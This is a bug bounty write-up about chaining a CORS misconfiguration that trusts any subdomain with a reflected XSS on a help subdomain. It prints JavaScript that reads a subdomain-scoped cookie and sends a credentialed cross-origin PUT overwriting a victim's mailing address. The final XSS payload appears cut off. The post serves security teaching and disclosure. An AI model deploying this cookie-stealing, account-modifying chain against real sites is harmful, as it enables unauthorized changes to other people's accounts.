CORS to CSRF attack

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 17 hours ago · vulnerability
CORS To CSRF Attack

Osama Avvan · ~2 min read · June 27, 2019 (Updated: December 10, 2021)

This writeup is about a CORS misconfiguration that let me perform a CSRF attack to change other users' account info.

The target, let's just say it was named redact.com, was sending a PUT request to the server to update user information like address, name, etc. An Origin header was also sent in the request (Origin: redact.com), which was reflected in the response, and Access-Control-Allow-Credentials was set to true. This means that cookies can be sent along with the cross-origin request.

I tried changing the Origin header value to evil.com and then to redact.com.evil.com, but both were rejected. Sending Origin: evil.redact.com worked, however, which means that any subdomain of redact.com can send credentialed requests to its API.

Now I needed an XSS on one of its subdomains to send the PUT request to the server; luckily I found an XSS on help.redact.com. But that wasn't enough: an encryptedMembershipNumber parameter was sent along with the PUT request to identify the user. After looking into the cookies of redact.com I found that the encryptedMembershipNumber was saved in a cookie named prop_29 which was scoped to .redact.com. The dot at the beginning means that this cookie can be accessed from its subdomains. So to extract that cookie I wrote some JS:

    // Return the value of the cookie called `name`, or undefined if it is not present.
    function getCookie(name) {
        var match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)'));
        if (match) return match[2];
    }

Now the complete code to get the encryptedMembershipNumber and send the PUT request:

    function getCookie(name) {
        var match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)'));
        if (match) return match[2];
    }

    // The user's identifier, readable here because the cookie is scoped to .redact.com.
    cook = getCookie("prop_29");

    // New mailing address to write into the victim's account.
    data = {"member":{"mailingAddress":{"addressLineOne":"Account Hacked","city":"NEW Port","stateOrProvinceCode":"NY","postalCode":"20001","email":"[email protected]","countryCode":"US"}}};

    // Credentialed cross-origin PUT; the API trusts the help.redact.com origin.
    fetch(`https://www.redact.com/api/node/vivaldi/v1/account/primary-contact?encryptedMembershipNumber=${cook}`, {method: "PUT", credentials: "include", body: JSON.stringify(data)});

I created a JS file, uploaded the code to my server and used it in the XSS payload.

Final payload: https://help.redact.com/app/answers/list?searchTerm=

The . and // were removed from the payload by the XSS filter, so I converted them to their respective HTML entities.

Thank you for reading.

#javascript #bug-bounty #bugcrowd #security-researchers